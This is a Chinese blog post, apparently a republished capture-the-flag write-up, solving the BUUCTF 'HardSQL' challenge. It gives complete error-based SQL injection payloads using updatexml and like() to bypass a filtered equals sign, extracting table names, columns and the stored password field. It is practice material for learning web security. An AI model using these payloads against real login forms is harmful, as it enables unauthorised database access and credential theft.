buuctf-[极客大挑战 2019]HardSQL

这篇具有很好参考价值的文章主要介绍了buuctf-[极客大挑战 2019]HardSQL。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

很久没做sql了。。

打开这题,还想拿sqlmap跑,但是没跑出来,要手注了buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

先用万能密码登了一下buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

回显,是有爆东西的

buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

然后就想到先用bp fuzz字典跑一下

就看到等号被过滤了,要用like来过滤

buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

然后就去搜了很多用like过滤的,但是没啥思路

看了wp

1'or(updatexml(0,concat(0x5e,database()),0))#

使用报错注入,就是括号很容易少打。。

可以看到爆出了用户名

buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

爆表了,H4rDsq1,因为这里等号被过滤了,所以要用like

1'or(updatexml(0,concat(0x5e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))),0))#

 buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

爆字段

1'or(updatexml(0,concat(0x5e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),0))#

buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

爆值

1'or(updatexml(0,concat(0x5e,(select(group_concat(password))from(H4rDsq1))),0))#

buuctf-[极客大挑战 2019]HardSQL,数据库,mysql 

但是发现只能看到一半,需要使用right函数

1'or(updatexml(0,concat(0x5e,right((select(group_concat(password))from(H4rDsq1)),31)),0))#

buuctf-[极客大挑战 2019]HardSQL,数据库,mysql

flag拼了半天我丢文章来源地址https://www.toymoban.com/news/detail-732260.html

到了这里,关于buuctf-[极客大挑战 2019]HardSQL的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [极客大挑战 2019]EasySQL1

    目录 一、解题思路 二、原理及相关知识点         打开页面看到如下界面, 有两个功能点且参数可控,允许上传 ,(这也是sql注入的基础)很明显与数据库存在信息交互,想到sql注入。         尝试简单万能密码:

    2024年02月16日
    浏览(28)
  • BUUFCTF—[极客大挑战 2019]Upload 1

    考点: 文件上传黑名单绕过 内容绕过 目录浏览 文件上传 1. 测试是黑名单还是白名单 上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。 所以要寻找黑名单外的php文件:php, php3, php5, php7, phtml都能作为php文件解析 ps:有些服务器默认不解析php3 phhtml等,如phps

    2024年02月04日
    浏览(29)
  • [极客大挑战 2019]FinalSQL(bypass盲注)

    这里是数字型注入,选择一个序号 这里过滤了很多东西 使用fuzzSQL字典,这是我自己定义编写的一个fuzz字典,内容较少 使用bp加载字典进行测试 看出被拦截的相应大小为890,那么之外的就是没有被拦截的 空格被过滤了,这里使用 ^ 来计算是否为数字注入 通过测试可以

    2024年02月09日
    浏览(31)
  • [极客大挑战 2019]PHP1-超详细

    [极客大挑战 2019]PHP1 提示:有一个良好的备份网站的习惯 寻找一个备份文件字典,我在github上找的: scopion/dic: 渗透字典,框架信息泄露,备份文件泄露,配置文件泄露。字典 (github.com) 我用的是top7777.txt字典,扫的很慢。 扫出来www.zip这个文件,然后下载下来 ,里面只有in

    2023年04月08日
    浏览(28)
  • buuctf [CISCN 2019 初赛]Love Math

    这题主要利用了php的一些特性 变量函数 数字转字符串 该php的功能是数值计算,数值计算可以使用指定的php数学函数,数学函数由 http://www.w3school.com.cn/php/php_ref_math.asp 这个链接的函数来指定 该题采用了黑名单和白名单的方式来过滤 这里采用可变字符来执行函数 但是_GET会被

    2024年02月11日
    浏览(24)
  • buuctf_练[CSCCTF 2019 Qual]FlaskLight

    [CSCCTF 2019 Qual]FlaskLight 掌握知识 内置函数的过滤, globals 变量的过滤,调用内部变量或函数的OS函数进行命令执行 解题思路 打开题目链接,很明显看标题和内容是 flask 模块的 ssti 模板注入了,查看源码,发现了传参的参数和请求方法 先测试一下 {{7*7}} ,正常返回49,证明存

    2024年02月08日
    浏览(32)
  • re学习(15)BUUCTF 2019红帽杯easyRe

    【BUUCTF】每天一个CTF11“2019红帽杯easyRe”_哔哩哔哩_bilibili (本人觉得看视频比看博客效率能提高十倍,呜呜呜,还是视频香~~~与君共勉) BUUCTF在线评测 前言:虽然带有easy,但是并不是那么easy。CTF偏向于算法,实战偏向于程序逻辑,执行的流程 AB键将转伪代码,与空格键配合

    2024年02月15日
    浏览(29)
  • buuctf PWN ciscn_2019_c_1

    encrypt()里面get函数存在溢出点offest=0x50+8。puts()可以用来泄露libc基址。 amd64的参数调用顺序是如下序列的自后而前,即:完成传递参数(地址)-本函数地址 - 返回地址 ... - pop_rdi;ret - argv - call_addr - ret_address 获得本elf中的gadgets: ROPgadget --binary ./ciscn_2019_c_1 --only \\\"pop|ret\\\" ROPgadg

    2024年02月07日
    浏览(23)
  • BUUCTF Misc [SUCTF2018]single dog & 我吃三明治 & sqltest & [SWPU2019]你有没有好好看网课?

    目录 [SUCTF2018]single dog 我吃三明治 sqltest [SWPU2019]你有没有好好看网课? 下载文件 使用kali的binwalk工具分析 进行文件分离 解压其中的压缩包,得到1.txt 看内容应该是js加密后的结果,复制到AAEncode在线解密网站 得到flag             flag{happy double eleven}  下载文件 使用010 eitor打

    2023年04月08日
    浏览(34)
  • VS2019连接MySQL数据库

    1、请设计一个项目连接到自己的MySQL数据库,数据库包含至少三张表; 2、使用dataGridView控件显示表中的数据; 3、实现基本crud操作; (1)下载mysql 的驱动 要不然在VS中连接数据库时会发现没有mysql数据库。 下载驱动: mysql-connector-odbc-8.0.20-winx64.msi mysql odbc驱动 mysql-for-visu

    2024年02月09日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包